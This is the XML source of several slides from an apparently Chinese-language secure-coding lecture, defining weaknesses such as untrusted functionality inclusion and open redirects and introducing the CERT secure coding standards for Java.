                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Shape 390"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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95" name="Shape 395"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Shape 396"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="39285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Shape 397"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Inclusion of Functionality from Untrusted Control Sphere</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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03" name="Shape 403"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 404"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="39285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Shape 405"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>URL Redirection to Untrusted Site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Shape 406"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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11" name="Shape 411"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="5113037"/>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好的文件化(Well-documented)以及採用程式寫作標準(enforceable coding standards)可以確保軟體安全的開發。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891"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程式寫作標準可以鼓勵程式設計師依循統一的規則與建議開發專案，而非根據程式設計師的個人喜好。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891"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一旦建立組織的標準，這些標準便可以做為評價程式碼的基準(metric)，以確保符合組織的安全目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891"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CERT 為一般常見的程式語言(例如C, C++, 以及Java)制定</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>安全程式寫作標準(secure coding standards)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891"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CERT所提供的安全程式寫作標準可以提供以下的指導方針:</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避免程式寫作的錯誤 (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>avoiding coding and implementation errors)</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避免低階設計的錯誤 (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>low-level design errors</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>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CERT Secure Coding Standards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Shape 414"/>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19" name="Shape 419"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Shape 420"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 421"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Shape 422"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="423" name="Shape 423"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3121349" y="2843199"/>
            <a:ext cx="5782624" cy="3252724"/>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27" name="Shape 427"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Shape 428"/>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The CERT Secure Coding Standard for Java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Shape 429"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1405055" y="1363187"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{A2717AC8-1ECA-4A94-8ABF-F172AB3327F9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="832225"/>
                <a:gridCol w="9320900"/>
              </a:tblGrid>
              <a:tr h="567175">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Trebuchet MS"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="3200"/>
                        <a:t>CERT Secure Coding Standard for Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">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gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:srgbClr val="000000"/>
                        </a:gs>
                        <a:gs pos="39999">
                          <a:srgbClr val="0A128C"/>
                        </a:gs>
                        <a:gs pos="70000">
                          <a:srgbClr val="181CC7"/>
                        </a:gs>
                        <a:gs pos="88000">
                          <a:srgbClr val="7005D4"/>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:srgbClr val="8C3D91"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="0"/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1"/>
              </a:tr>
              <a:tr h="447750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>00.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Input Validation and Data Sanitization (IDS)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>01.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Declarations and Initialization (DCL)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="468300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>02.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Expressions (EXP)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>03.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
